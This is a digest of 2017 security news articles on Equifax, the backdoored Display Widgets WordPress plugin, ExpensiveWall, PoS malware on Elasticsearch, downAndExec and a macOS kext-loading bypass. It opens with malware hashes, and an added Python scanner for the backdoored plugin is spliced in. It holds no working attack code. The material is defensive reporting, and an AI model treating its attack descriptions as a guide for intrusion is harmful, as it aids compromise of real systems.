PDM:Trojan.Win32.Generic
IOCs:

185b23c602e64dc6bcd2a2776095653e
33e46f76bc9bf1ff8380406f111f56af
26f42df21371bd4afe86a643ac0a6b44
25451e6fe30b54b432854bde5b9abb74


Kaspersky Chief Agrees to Testify Before Congress

15.9.2017 securityweek BigBrothers
After the U.S. Department of Homeland Security (DHS) issued a binding operational directive ordering government departments and agencies to stop using products from Russia-based Kaspersky Lab, the security firm’s CEO has been invited to testify before Congress.

Eugene Kaspersky, Kaspersky Lab’s chairman and CEO, posted on Twitter a screenshot of the invitation he received from the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology.

While the CEO has accepted the invitation to testify, the hearing has been scheduled for September 27, which might not give him enough time to obtain a U.S. visa.

Eugene Kaspersky to testify before U.S. congress

“Hope to get expedited visa,” Kaspersky said on Twitter. “As of today it takes ~2 months to get one.”

In the letter sent to Kaspersky, the government said the purpose of the hearing is to “conduct oversight of the cybersecurity posture of the federal government, and examine the extent to which the federal government utilizes your company’s products.” The hearing will also review the implementation by federal agencies of the recent Executive Order on strengthening the cybersecurity of federal networks and critical infrastructure, and the NIST cybersecurity framework.

There have been numerous media reports in the past months about Kaspersky’s alleged ties to Russian intelligence, which has raised concerns among officials, ultimately leading to the U.S. General Services Administration removing Kaspersky Lab from its list of approved vendors, and the DHS ordering government agencies to establish and implement a plan for the replacement of such products in the next 90 days.

In addition to Kaspersky Lab’s alleged ties to Russian intelligence, the DHS’s binding operational directive also references Russian laws that allegedly allow the country’s intelligence agencies to request or compel assistance from Kaspersky. However, the company pointed out that these laws only apply to ISPs and other telecoms services providers.

The announcement made by the DHS this week said Kaspersky will be given the opportunity to submit a written response to address or mitigate concerns, which the security firm welcomed.

In many cases, Kaspersky provided point-by-point responses to the allegations included in media articles regarding the company’s ties to the Russian government, but those arguments have not had any effect on the decisions and proposals made by U.S. officials. On the other hand, many members of the cybersecurity industry pointed out that no evidence has been provided to prove the antivirus company’s alleged inappropriate connections.

“I've repeatedly offered to meet with government officials, testify before the U.S. Congress, provide the company's source code for an official audit and discuss any other means to help address any questions the U.S. government has about Kaspersky Lab - whatever it takes, I will do it. And I look forward to working with any agency or government officials that are interested,” Kaspersky said in a piece published by Forbes.

“So what exactly is going on? Well, it looks to me like the reason for being shunned (despite our many offers to assist) can only be one thing: geopolitical turbulence,” Kaspersky explained. “As I've said before, it's not popular to be Russian right now in some countries, but we cannot change our roots, and frankly, having these roots do not make us guilty.”

Kaspersky Lab recently announced plans to open three new regional offices in North America next year — one in Canada and two in the U.S.


Mozilla Implements Faster Diffie-Hellman Function in Firefox

15.9.2017 securityweek Krypto
Mozilla this week revealed plans to introduce a new key establishment algorithm in Firefox to improve both the security and the performance of the web browser.

Called Curve25519, and designed by Daniel Julius Bernstein, the algorithm is a high-security elliptic-curve-Diffie-Hellman function deemed suitable for a wide variety of cryptographic applications. The public key cryptography can achieve record-setting speeds, while also offering free key compression, free key validation, and state-of-the-art timing-attack protection, Bernstein explains (PDF).

Widely used for key exchange in TLS, Curve25519 was recently standardized by the Internet Engineering Task Force (IETF). Mozilla has already implemented the algorithm in the latest Firefox Nightly and expects Firefox 57, set to be released in November, to bring the feature to all users, Benjamin Beurdouche of the INRIA Paris Prosecco team reveals.

The implementation of Curve25519 into Firefox is the result of a collaboration with INRIA (French Institute for Research in Computer Science and Automation) and Project Everest (Microsoft Research, Carnegie Mellon University, INRIA).

Through the partnership, Mozilla aims to make Firefox the first major web browser with formally verified cryptographic primitives.

In addition to being formally verified, the HACL Curve25519 implementation is also expected to deliver a 20% performance increase on 64-bit platforms when compared to the existing NSS implementation (19500 scalar multiplications per second instead of 15100).

The enhancement, the Internet organization points out, is expected to improve the overall security of Firefox and its users, given that the key exchange algorithm has already been formally verified.

“Even innocuous looking bugs in cryptographic primitives can break the security properties of the overall system and threaten user security. Fortunately, recent advances in formal verification allow us to significantly improve the situation by building high assurance implementations of cryptographic algorithms,” Beurdouche says.

The organization also plans on implementing other HACL algorithms into NSS, and expects to be able to do so over the next months.


Premium SMS malware EXPENSIVEWALL infected millions of Android handsets
15.9.2017 securityaffairs Android

Google removed 50 malicious apps from the official Play Store after experts discovered a new malware, dubbed ExpensiveWall, eluded Google Bouncer checks.
Google has removed 50 malicious apps from the official Play Store after experts with security firm Check Point discovered a new malware, dubbed ExpensiveWall, that eluded the checks of Google’s Bouncer.

The ExpensiveWall malware was found in the Lovely Wallpaper app; it carries a payload that registers victims for paid online services and sends premium SMS messages from their devices. The malicious code was discovered in 50 apps on the Play Store that had been downloaded by between 1 million and 4.2 million users.

“Check Point’s mobile threat research team identified a new variant of an Android malware that sends fraudulent premium SMS messages and charges users’ accounts for fake services without their knowledge.” states the analysis shared by Check Point researchers.

“The new strain of malware is dubbed “ExpensiveWall,” after one of the apps it uses to infect devices, “Lovely Wallpaper.””

expensivewall malware

The malware is not totally new to security experts; malware researchers with McAfee first spotted it in the Play Store in January, but Check Point highlighted that the payloads have significant differences.

The ExpensiveWall authors encrypted and compressed the malicious code in order to bypass Google’s automated checking processes, and they succeeded!

Once the application is installed by the victim, it requests permission to access the internet and to send and receive SMS messages. ExpensiveWall then sends handset information back to the C&C server, including its location, MAC and IP addresses, IMSI, and IMEI numbers.

The C&C server, in turn, sends the malware a URL that it opens in an embedded WebView window and downloads the JavaScript code used to send the premium SMS messages.

According to Check Point researchers, the malicious code is spread to different applications as a software development kit called GTK.

“After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called “gtk,” which developers embed in their own apps. Three versions of apps containing the malicious code exist. The first is the unpacked version, which was discovered earlier this year. The second is the packed version, which is being discussed here, and the third contains the code but does not actively use it.” continues the analysis.

Check Point reported the discovery to Google on August 7, 2017, and the company promptly removed the malicious apps from the Google Play Store. Unfortunately, even after the affected apps were removed from the store, another sample was spotted in Google Play within days; this one had likely infected more than 5,000 devices before it was removed four days later.

Experts said Google missed warnings about the malware infection that users who had downloaded the apps published in the comments section. One of the infected apps received a large amount of negative feedback from outraged users who had noticed the malicious behavior.

Unfortunately, such incidents are becoming frequent: in June, Google twice within a month removed malicious apps infected with the Ztorg Trojan, which allowed attackers to root targeted devices.

In April, millions of users looking to get software updates downloaded an app hiding a spyware called SMSVova through the official Google Play store.

It has been estimated that the fake application hiding the SMSVova spyware was uploaded in the Google Play in 2014, and has been downloaded between 1,000,000 and 5,000,000 times.

Clearly, Google must improve its checks to avoid further incidents.


Thousands of Elasticsearch installs compromised to host PoS Malware
15.9.2017 securityaffairs Virus

Experts discovered 4,000 compromised installations on Amazon AWS of open source analytics and search tool Elasticsearch that were running PoS malware.
Security researchers from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

According to Kromtech, this is just a portion of the overall number of compromised servers. Expert Bob Diachenko from Kromtech reported those servers are just 27 per cent of a total of 15,000 unsecured Elasticsearch installations discovered by the firm, and 99 per cent of the infected servers are hosted on Amazon AWS.

pos malware Elasticsearch

Amazon Web Services provides customers with a free T2 micro (EC2 / Elastic Compute Cloud) instance with up to 10 Gb of disk space, but clearly, customers are not able to properly secure the installs.

The AWS offer only includes Elasticsearch versions 1.5.2 or 2.3.2, and unfortunately users skip all security configuration during the quick installation process. Because of the poor settings chosen by the operators, the malware runs with full administrative privileges on the compromised systems.

“The Amazon hosting platform gives users the possibility to configure the ElasticSearch cluster just in few clicks, but usually, people skip all security configuration during the quick installation process. This is where a simple mistake can have big repercussions and in this case it did by exposing a massive amount of sensitive data.” wrote Diachenko.

The company found command-and-control servers for Alina and JackPoS point-of-sale malware running on the compromised Elasticsearch installs.

Threat actors are managing a big POS Botnet with Command and Control (C&C) that collects credit card information stolen from payment systems.

“The lack of authentication allowed the installation of malware on the ElasticSearch servers. The public configuration allows the possibility of cyber criminals to manage the whole system with full administrative privileges. Once the malware is in place criminals could remotely access the server’s resources and even launch a code execution to steal or completely destroy any saved data the server contains.” continues Diachenko.

Below the key findings of the research conducted by Kromtech:

There are different packages of C&C malware, i.e. servers were infected multiple times

Different packages can be related to different Botnets (because POS malware was seen selling not only on Darknet but on public domains as well)

There are many infected servers; for the same packages on different servers, the time of infection could differ due to periodic scans and botnet network expansion

Nearly 99% of infected servers are hosted on Amazon Web Services

52% of infected servers run Elastic Search 1.5.2 version, 47% – 2.3.2 version, and 1% for other versions.

Recent infections were made at the end of August 2017

Sysadmins must urgently check their Elasticsearch installs, analyze connections and traffic, and check for the presence of PoS malware. In case of compromised installs, they can provide the sample to Kromtech before reinstalling the systems and applying patches as required.


Backdoored Display Widgets Plugin potentially affects 200,000 WordPress installs abusing them to spam content
15.9.2017 securityaffairs Spam

Around 200,000 WordPress websites using the Display Widgets Plugin were impacted after it was updated to include malicious code.
According to security firm Wordfence, roughly 200,000 WordPress websites were impacted after a plugin they were using was updated to include a backdoor.

“If you have a plugin called “Display Widgets” on your WordPress website, remove it immediately. The last three releases of the plugin have contained code that allows the author to publish any content on your site. It is a backdoor.” reported Wordfence.

“The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed and readmitted to the WordPress.org plugin repository a total of four times. The plugin is used by approximately 200,000 WordPress websites, according to WordPress repository.”


The plugin, Display Widgets, was sold by its author to a third-party developer on May 19, 2017, for $15,000.

A month after the sale, the plugin was updated by its new owner and for the first time showed strange behavior. By September the plugin had been updated several times and had already been removed from the plugin repository multiple times.

The Display Widgets plugin version 2.6.0, released on June 21, was removed from the repository just two days later after experts noticed it was downloading 38 megabytes of code (a Maxmind IP geolocation database) from an external server.

A few days later, on June 30, version 2.6.1 was released; it was found to contain a malicious file called geolocation.php that allowed the author to post new content to websites running the plugin. The code also allowed the author to update and remove content without giving any indication to the site admins.

Display Widgets was removed from the WordPress repository on July 1; nevertheless, the author continued to issue further releases.

Version 2.6.2 of Display Widgets was released a week later with updated malicious code, but the plugin was then removed from the plugin repository on July 24. The plugin owner published version 2.6.3 on September 2; in this case too the malicious code was updated to fix a bug. Display Widgets was removed from the WordPress plugin repository on September 8.

The plugin owners suggested that the malicious code was a vulnerability that could be exploited in combination with other plugins to display spam content to users.

According to the experts, WordPress installs using version 2.6.1 to version 2.6.3 of Display Widgets are possibly impacted by the malicious code and might be displaying spam content.

Wordfence highlighted that the new plugin owners may have intentionally acted to compromise the websites using the plugin: they included a fix for the backdoor in the latest release, meaning they were aware of it and were exploiting it for malicious purposes.

Further investigation allowed the experts to discover that the man behind the plugin spam was Briton Mason Soiza, 23, who bought the plugin in late May. The original author, who goes online by the moniker Strategy11, confirmed that Soiza approached his development team claiming his firm was trying to “build one of the largest WordPress plugin companies” and that they were already distributing over 34 plugins.

One of these plugins, dubbed 404 to 301, was found delivering spam for a website owned by Soiza last year. The server used to serve spam to the plugin hosts a website owned by Soiza. While Soiza claims to have purchased the Display Widgets plugin only earlier this year, experts at Wordfence believe he could be involved in suspicious activities. Wordfence discovered that he also used the Kevin Danna alias and that he has interests in online businesses such as payday loans, gambling, and escort services, among others.

“He has interests in a wide range of online business that include payday loans, gambling and ‘escort’ services, among others.” reported Wordfence.

Soiza claims to have sold Display Widgets for profit shortly after buying it and denied being involved in any illegal activity.


Which types of security are in vogue and which are not?

15.9.2017 SecurityWorld Security
As the use of cloud services grows, so does interest in securing data, applications and activities in the cloud environment. Gartner has therefore compiled a hype cycle for cloud security, with which security experts can better understand which technologies are already mature for routine deployment and which will take several more years before they are mature enough for use in most organizations.

“Security continues to be one of the most frequently cited reasons why organizations avoid using the public cloud. Yet, paradoxically, the companies that do use the public cloud consider security one of its main benefits,” says Jay Heiser, research vice president at Gartner.

At the same time, he points out that the security of cloud services can be viewed from several angles. The two main ones are the resilience of the services themselves (for example against attacks) and the ability of users to use them securely.

According to Heiser, the hype cycle can help organizations find their way among technologies intended precisely for the controlled and efficient use of public cloud services in compliance with internal and legislative regulations.

At the very beginning of the curve, i.e. before the “hype” phase of inflated expectations, are container security technologies, backup to the cloud, and immutable infrastructure for security, that is, replacing applications with new running instances instead of shutting them down and restarting them.

At the peak of the hype cycle are currently, for example, SDP (software-defined perimeter), KMaaS (key management as a service), and mobile DLP (data loss prevention or protection on mobile devices).

Conversely, near the lowest point of the “trough of disillusionment” is, for example, private cloud, which should however “mature” to the productivity phase in less than two years, and CSB (cloud service brokerage), whose path to “maturity” will take 2–5 years.

Just before the productivity phase are, for example, virtual machine backup and recovery or DR as a service (DRaaS); the productivity phase has been reached by, for example, tokenization, application security as a service, highly available and secure hypervisors, and identity and profile management services.


U.S. Watchdog Confirms Probe of Huge Equifax Data Breach

14.9.2017 securityweek Incident
A U.S. consumer protection watchdog agency said Thursday it has begun an investigation into a massive data breach at credit bureau Equifax that may have leaked sensitive information on 143 million people.

The Federal Trade Commission joins US congressional committees promising to probe the causes and implications of what could be the worst breach of personal information in the United States.

"The FTC typically does not comment on ongoing investigations," said Peter Kaplan, the agency's acting director of public affairs.

"However, in light of the intense public interest and the potential impact of this matter, I can confirm that FTC staff is investigating the Equifax data breach."

The hack disclosed last week at Equifax, one of the three major credit bureaus which collect consumer financial data, potentially affects more than half the adult population.

While not the largest breach -- Yahoo attacks leaked data on as many as one billion accounts -- the Equifax incident could be the most damaging because of the nature of data collected: bank and social security numbers and personal information of value to hackers and others.

US lawmakers have expressed concern over the implications of the hack and have called for hearings.

The House Energy and Commerce Committee announced it would hold an October 3 hearing with Equifax chief executive Richard Smith.

"We know members on both sides of the aisle appreciate Mr Smith's willingness to come before the committee and explain how our constituents might be impacted and what steps are being taken to rectify this situation," said a statement from Senators Greg Walden and Bob Latta.

Smith earlier this week offered an expanded apology to consumers in a column in USA Today.

"Consumers and media have raised legitimate concerns about the services we offered and the operations of our call center and website. We accept the criticism and are working to address a range of issues," Smith wrote.

"We are devoting extraordinary resources to make sure this kind of incident doesn't happen again."

Equifax said in a "progress report" on its website that criminals exploited a vulnerability in a website application called Apache Struts.

Security researcher Kevin Beaumont said in a blog post that he warned of the vulnerability in March and urged companies to fix it. "I kept reissuing warnings," Beaumont said in a blog this week. "And then I gave up. Many Fortune 500 companies are still running these systems."


Equifax Confirms Apache Struts Flaw Used in Hack

14.9.2017 securityweek Vulnerability
U.S. credit reporting agency Equifax confirmed on Wednesday that an Apache Struts vulnerability exploited in the wild since March was used to breach its systems.

Equifax informed customers last week that hackers had access to its systems between mid-May and late July. The breach, which affects roughly 143 million U.S. consumers, involved names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers.

The credit card numbers of roughly 209,000 consumers in the United States and dispute documents belonging to 182,000 people may have also been stolen by the attackers. Individuals in the U.K. and Canada are also affected and a class action was already initiated by Canadian consumers.

Equifax initially only revealed that the cybercriminals exploited a vulnerability in a “U.S. website application” to access files. However, financial services firm Baird later claimed to have learned that the application in question was Apache Struts, a framework used by many top organizations to create web apps.

While some believed that the Apache Struts vulnerability was the recently patched CVE-2017-9805, which has been increasingly exploited in the wild to deliver malware, a more likely candidate was CVE-2017-5638, a vulnerability disclosed and fixed in March, and leveraged by cybercriminals shortly after.

An update posted by Equifax on Wednesday to the website dedicated by the company to the cybersecurity incident confirms that CVE-2017-5638 was the Apache Struts 2 flaw exploited by attackers.

“We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement,” the company said.

This shows that the breach was possible due to the company’s failure to patch a critical vulnerability for more than two months after its disclosure. Following the incident, others started highlighting holes in Equifax’s cyber security, including unpatched cross-site scripting (XSS) vulnerabilities reported to the company more than one year ago, and the lack of many basic protections.

Security blogger Brian Krebs reported on Tuesday that an Equifax Argentina employee portal exposed 14,000 records, including employee credentials and consumer complaints.

After New York Attorney General Eric T. Schneiderman announced the launch of a formal investigation into the Equifax breach, Illinois and nearly 40 other states joined the probe.

Equifax shares have fallen more than 30% since the disclosure of the breach, wiping roughly $5.3 billion off the company’s market capitalization.


Backdoored Plugin Impacts 200,000 WordPress Sites

14.9.2017 securityweek Vulnerability
Around 200,000 WordPress websites were impacted after a plugin they were using was updated to include malicious code, Wordfence reports.

Dubbed Display Widgets, the plugin was sold by its original author to a third-party developer on May 19, 2017, for $15,000. Roughly one month after that, the plugin was updated by its new owner and started displaying malicious behavior. By early September, the plugin had gone through several updates and had been already removed from the plugin repository multiple times.

The first malicious Display Widgets iteration was version 2.6.0, released on June 21 and removed from the repository two days later. It was downloading 38 megabytes of code (a large Maxmind IP geolocation database) from an external server.

On June 30, version 2.6.1 was released, containing a malicious file called geolocation.php and designed to post new content to websites running the plugin. The code also allowed the plugin author to update content and remove content and prevented logged-in users (such as site owners) from seeing the content. Display Widgets was removed from the WordPress repository on July 1.

Version 2.6.2 of Display Widgets was released a week later with modified malicious code and was removed from the plugin repository on July 24. The plugin owner published version 2.6.3 on September 2 and even included a bug fix in the malicious code. Display Widgets was removed from the WordPress plugin repository on September 8.

Before the plugin was removed the fourth time, the plugin owners suggested that the malicious code was a vulnerability that could be exploited in combination with other plugins to display spam content to users. According to Wordfence, the code was in fact a backdoor providing the authors with access to publish content on websites using the plugin.

All sites using version 2.6.1 to version 2.6.3 of Display Widgets are possibly impacted by the malicious code and might be spamming their users with unwanted content. And while the new plugin owners may say they were unaware of the malicious behavior, Wordfence claims otherwise, pointing out that they included a fix for the malicious code in the latest release, meaning they were aware of its functionality.

The person who bought the plugin in late May is Mason Soiza, 23, of the U.K., the researchers have discovered. The former authors at Strategy11 revealed that Soiza approached them claiming his firm is trying to “build one of the largest WordPress plugin companies” and that they were already managing over 34 plugins.

One of these plugins appears to be 404 to 301, which was found to deliver spam last year. The spammed content was for a website owned by Soiza, while the server used to serve spam to the plugin serves another website he owned. However, Soiza apparently claims to have purchased this plugin only earlier this year.

Wordfence also discovered that he would sometimes use the Kevin Danna alias and that he has interests in online business such as payday loans, gambling, and escort services, among others. Contacted by the researchers, Soiza claims to have sold Display Widgets for profit shortly after buying it.
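A defender-side check for the two indicators the reports above give (the backdoored Display Widgets releases 2.6.1 through 2.6.3 and the geolocation.php file), as an added Python example that is not Wordfence's or the plugin's own code; the plugins directory it scans is constructed inline as sample data.

```python
"""Scan a WordPress plugins directory for the backdoored Display Widgets releases.

Added example, not Wordfence's or the plugin's own code. It applies the two
indicators the reports give: plugin versions 2.6.1 through 2.6.3, and the
presence of the malicious geolocation.php file. The sample site layout is
constructed here for the demonstration.
"""
import os
import re
import tempfile

# Version range the reports identify as carrying the backdoor.
AFFECTED_MIN = (2, 6, 1)
AFFECTED_MAX = (2, 6, 3)
BACKDOOR_FILE = "geolocation.php"

# Standard WordPress plugin header lines, with or without a leading " * ".
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.MULTILINE)


def parse_version(text):
    """Turn '2.6.1' into (2, 6, 1); a non-numeric tail such as '-beta' is dropped."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def read_plugin_header(plugin_dir):
    """Return (name, version) from the first PHP file carrying a WordPress
    plugin header, or (None, None) if no header is found."""
    for entry in sorted(os.listdir(plugin_dir)):
        if not entry.endswith(".php"):
            continue
        with open(os.path.join(plugin_dir, entry), encoding="utf-8", errors="replace") as fh:
            head = fh.read(8192)  # WordPress itself only inspects the start of the file
        fields = dict(HEADER_RE.findall(head))
        if "Plugin Name" in fields:
            return fields["Plugin Name"], fields.get("Version", "")
    return None, None


def scan_plugins(plugins_root):
    """Return one finding dict per suspicious plugin directory under plugins_root."""
    findings = []
    for slug in sorted(os.listdir(plugins_root)):
        plugin_dir = os.path.join(plugins_root, slug)
        if not os.path.isdir(plugin_dir):
            continue
        name, version = read_plugin_header(plugin_dir)
        reasons = []
        if name and name.strip().lower() == "display widgets":
            if AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX:
                reasons.append("backdoored release %s" % version)
        # The malicious file is an indicator on its own, whatever the header says.
        if os.path.isfile(os.path.join(plugin_dir, BACKDOOR_FILE)):
            reasons.append("contains %s" % BACKDOOR_FILE)
        if reasons:
            findings.append({"slug": slug, "name": name, "version": version, "reasons": reasons})
    return findings


def build_sample_site():
    """Construct a throwaway plugins directory holding one clean plugin and one
    affected Display Widgets install (sample data, not a real site)."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")

    def write(slug, filename, body):
        d = os.path.join(root, slug)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, filename), "w", encoding="utf-8") as fh:
            fh.write(body)

    write("hello-dolly", "hello.php", "<?php\n/*\nPlugin Name: Hello Dolly\nVersion: 1.6\n*/\n")
    write("display-widgets", "display-widgets.php",
          "<?php\n/*\nPlugin Name: Display Widgets\nVersion: 2.6.1\n*/\n")
    # Placeholder standing in for the malicious file; its name is the indicator.
    write("display-widgets", BACKDOOR_FILE, "<?php // placeholder\n")
    return root


if __name__ == "__main__":
    for f in scan_plugins(build_sample_site()):
        print(f["slug"], f["version"], "; ".join(f["reasons"]))
```

On a real site, point scan_plugins at wp-content/plugins; any hit means the plugin should be removed and the site's published content reviewed, as Wordfence advises above.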


New Attack Abuses CDNs to Spread Malware

14.9.2017 securityweek Virus
Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.

The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.


Secure Kernel Extension Loading in macOS Easily Bypassed: Researcher

14.9.2017 securityweek Apple
Apple's new Secure Kernel Extension Loading (SKEL) security feature, set to be implemented in the upcoming macOS 10.13 High Sierra, can be easily bypassed, a security researcher claims.

The issue, according to Patrick Wardle, Chief Security Researcher at Synack, is with the current implementation of the feature, which does almost nothing to stop hackers or malware, although it does hamper the efforts of third-party macOS developers such as those that design security products.

According to Wardle, while SKEL is designed to counter the direct loading of malicious kernel extensions such as rootkits, no signed kernel-mode macOS malware has emerged to date.

“Since OS X Yosemite, any kexts have to be signed with a kernel code-signing certificate. And unlike user-mode Developer IDs, Apple is incredibly ‘protective’ of such kernel code-signing certificates – only giving out a handful to legitimate 3rd-party companies that have justifiable reasons to create kernel code,” he points out.

Thus, SKEL’s main goal would be to block the loading of legitimate but (known) vulnerable kexts, given that attackers can exploit them to gain arbitrary code execution within the context of the kernel. Apple can blacklist these vulnerable kexts via the OSKextExcludeList dictionary, but the operation is often delayed, because it can break functionality until the user has upgraded to a non-blacklisted version of the kext.

According to Wardle, the exploitable kernel heap overflow in Little Snitch’s kernel driver that he discovered last year can be abused by a local privileged attacker to bypass macOS’s kernel code-signing requirements.

An attacker with root privileges can load a vulnerable copy of the LittleSnitch.kext (versions earlier than 3.61), which would be allowed, given that the vulnerable driver is still validly signed, and then exploit the heap-overflow to gain arbitrary code execution within the kernel. Next, the attacker can bypass system integrity protection (SIP), load unsigned kexts, and perform other nefarious operations.

SKEL can block the direct loading of maliciously signed kexts, but it is mainly designed to “thwart the loading of known vulnerable drivers for malicious purposes,” Wardle claims. Thus, when a signed third-party kernel extension is loaded on High Sierra for the first time, SKEL blocks it and alerts the user. The user, however, can manually approve the (signed) kernel extension to load.

However, the blocking doesn’t happen if the kernel extension was “already installed at the time of upgrading to macOS High Sierra,” if it is signed with the same Team ID as a previously approved extension, is “replacing a previously approved extension,” or is being loaded on a Mac that is enrolled with an MDM solution.

The researcher discovered that, when blocking the kext and alerting the user, the system policy daemon accesses a ‘kernel policy’ database, and notes that this is what tells SKEL to block or allow the loading. Due to an implementation vulnerability in SKEL, Wardle was able to load a new unapproved kext, without user interaction.

Wardle didn’t provide technical details on the vulnerability as of now, but did publish a demo of a full SKEL bypass. He says that High Sierra’s SKEL’s flawed implementation is a perfect example of how new security features can often just complicate the lives of third-party developers.


“Of course though, as attackers we have the easier job – a single implementation flaw in SKEL may allow us to fully bypass it. Apple on the other hand, has to protect against everything,” the researcher points out.


Zerodium Offers $1 Million for Tor Browser Exploits

14.9.2017 securityweek Security
Exploit acquisition firm Zerodium announced on Wednesday that it’s prepared to offer a total of $1 million for zero-day vulnerabilities in the Tor Browser, the application that allows users to access the Tor anonymity network and protect their privacy.

The controversial company plans on selling the obtained exploits to its government customers to allegedly help them identify people that use Tor for drug trafficking and child abuse, and “make the world a better and safer place for all.”

Zerodium is looking for Tor Browser exploits that work on Windows and Tails, a security and privacy-focused Linux distribution. While the highest rewards can be earned for exploits that work on “high” security settings with JavaScript blocked, the company is also prepared to pay out significant amounts of money for exploits that work only with JavaScript allowed, which is the “low” security setting in Tor Browser.

An exploit that allows both remote code execution and local privilege escalation can earn up to $250,000 if it works on both Windows 10 and Tails 3.x with JavaScript blocked. If the exploit works on only one of the operating systems, it can still be worth up to $200,000.

A remote code execution exploit that does not include privilege escalation capabilities is worth up to $185,000 with JavaScript blocked. Exploits that require JavaScript to be enabled can earn up to $125,000 if they include both code execution and privilege escalation, and $85,000 if it’s only for code execution. The minimum bounty is $75,000 for an RCE-only exploit that works on either Windows or Tails.

Zerodium explained that the exploit must work silently and the only allowed user interaction is visiting a specially crafted web page. Exploits that require controlling or manipulating Tor nodes, or ones that can disrupt the Tor network will not be accepted.

“With the increased number (and effectiveness) of exploit mitigations on modern systems, exploiting browser vulnerabilities is becoming harder every day, but still, motivated researchers are always able to develop new browser exploits despite the complexity of the task, thanks to their skills and a bit of scripting languages such as JavaScript,” Zerodium said.

The Tor Browser bounty will run until November 30, but it may be closed earlier if the $1 million reward pool is paid out.

This is not the first time the company is offering $1 million. Back in 2015, it reportedly paid this amount to a single hacker team who discovered a remote browser-based untethered jailbreak for iOS 9.1.

Zerodium announced last month that it’s prepared to pay up to $500,000 for remote code execution and privilege escalation vulnerabilities affecting popular instant messaging and email applications.


Apple Brings FaceID to New iPhone X

14.9.2017 securityweek Apple
iPhone X Uses Facial Recognition to Unlock Device, Apple Says 1 in 1,000,000 Chance of False Positive

At the Apple Special Event 2017, Apple announced on Tuesday three new iPhones (X, 8 and 8 Plus), the Apple Watch Series 3, the new Apple TV 4K -- and new software in the form of iOS 11 and WatchOS 4. Star of the show, however, is the new iPhone X (pronounced 'ten') that marks the tenth anniversary of the birth of iPhones.

As with many things Apple, the iPhone X capabilities range from the sublime to the ridiculous: from new facial biometric unlocking to user emotion-matching emojis. Both come courtesy of the new front-facing camera system that continuously scans the user's face.

From a security perspective, the key elements include ditching the Home key and fingerprint access for facial access, and a new requirement for a passcode to be entered before the iPhone can be connected to an external device (such as, for example, a forensic scanning system).

Facial recognition is not new to mobile phones; but early attempts could sometimes be circumvented by presenting a photograph of the genuine user. Apple claims that this will not work.

The iPhone X uses a TrueDepth camera system combined with a series of sensors (including proximity and ambient light) at the top of the front of the phone. Coupled with infra-red capabilities and an internal neural engine, the iPhone can recognize its owner with only 1 in 1,000,000 false positives, day or night. This compares to just 1 in 50,000 false positives for the earlier TouchID fingerprint access.

At one level, this would seem to solve law enforcement's problem in accessing a suspect's iPhone. While it would be possible to physically force a suspect to present a finger to TouchID (with varying degrees of legality, and possibly the wrong finger), the X merely needs to 'see' the suspect's face.

However, this is offset by an additional feature in the iOS 11 software: any attempt to connect the iPhone to an external device will now require an extra passcode. So, while it may be easier for law enforcement to access what is visible on the phone itself, it will be much harder to attach an external device, such as a PC, to allow full forensic investigation of the phone.

For now, we only know what Apple has told us -- so we don't know how subtle or nuanced the facial recognition can become. We are told that, courtesy of the neural engine, the system gets better over time at recognizing its user, and can adapt to recognize changes (such as aging). We are told that wearing a hat or growing a beard will not confuse it.

But we don't know whether it can detect specific emotions, such as fear, that could be used as a panic button. Without an obvious and clear panic button, there is a danger that violence in phone thefts could escalate -- physical thieves could use physical force against the user to both steal and unlock the phone. Tapping the side power button five times in rapid succession will disable FaceID, but it is debatable whether a user under duress would have either the time or composure to do this.

It is possible, of course, that an emotional panic button could be introduced since the new user-imitating animated emojis are based on the user's emotions, as scanned by the TrueDepth camera.


